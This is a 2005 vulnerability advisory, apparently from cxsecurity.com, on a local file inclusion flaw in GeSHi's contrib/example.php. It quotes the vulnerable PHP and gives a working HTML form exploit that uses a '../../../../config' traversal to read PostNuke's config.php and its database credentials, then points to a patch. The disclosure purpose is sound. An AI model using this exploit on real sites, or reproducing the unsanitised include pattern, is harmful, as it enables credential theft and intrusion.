GeSHi 1.0.7.2 Local file inclusion

2005.09.30
Credit: Anonymous
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-98


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

[GeSHi Local PHP file inclusion 1.0.7.2] Author: Maksymilian Arciemowicz ( cXIb8O3 ).17 Date: 21.9.2005 - --- 0.Description --- GeSHi started as a mod for the phpBB forum system, to enable highlighting of more languages than the available (which was 0 ;)). However, it quickly spawned into an entire project on its own. But now it has been released, work continues on a mod for phpBB - and hopefully for many forum systems, blogs and other web-based systems. Several systems are using GeSHi now, including: PostNuke - A popular open source CMS Docuwiki - An advanced wiki engine gtk.php.net - Their manual uses GeSHi for syntax highlighting WordPress - A powerful blogging system PHP-Fusion - A constantly evovling CMS SQL Manager - A Postgres DBAL Mambo - A popular open source CMS MediaWiki - A leader in Wikis TikiWiki - A megapowerful Wiki/CMS, and one I personally use RWeb - A site-building tool - --- 1. Local (PHP) file inclusion --- I have found one bug in file ./contrib/example.php This file exists in standart packet GeSHi. In file: - -10-18-line--- include('../geshi.php'); if ( isset($_POST['submit']) ) { if ( get_magic_quotes_gpc() ) $_POST['source'] = stripslashes($_POST['source']); if ( !strlen(trim($_POST['source'])) ) { $_POST['source'] = implode('', @file('../geshi/' . $_POST['language'] . '.php')); $_POST['language'] = 'php'; } - -10-18-line--- Ok.. so, if exists variable $_POST['submit'] and $_POST['language'], you can read any php file (for example in postnuke -config.php-). You need use varible $_POST['language'] wher is path to php file. I have tested this bug in GeSHi package and in PostNuke 0.760. PostNuke 0.760 (file: ./modules/pn_bbcode/pnincludes/contrib/example.php) We can read config.php in PostNuke where we have login, password, dbname and dbhost. All variables needed to log in to database. So we can just use this exploit below : - --- EXPLOIT TESTED IN POSTNUKE 0.760 --- <center><a href="http://cxsecurity.com" target="http://cxsecurity.com/"><img src="http://cxsecurity.com/gfx/small_logo.png"></a><p> <form action="http://[HOST]/modules/pn_bbcode/pnincludes/contrib/example.php" method="post"> Path to file:<br> example: <b>../../../../config</b><br> <textarea name="language"></textarea><br> <input type="submit" name="submit" value="See"> </form> - --- EXPLOIT FOR POSTNUKE 0.760 --- [HOST] = example. http://www.cxsecurity.com/postnuke/html any questions? ;] - --- 2. How to fix --- Patch http://cxsecurity.com/patch/2 works in PostNuke 0.760 or new version of script 1.0.7.3 - --- 3.Contact --- Author: Maksymilian Arciemowicz < cXIb8O3 >


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top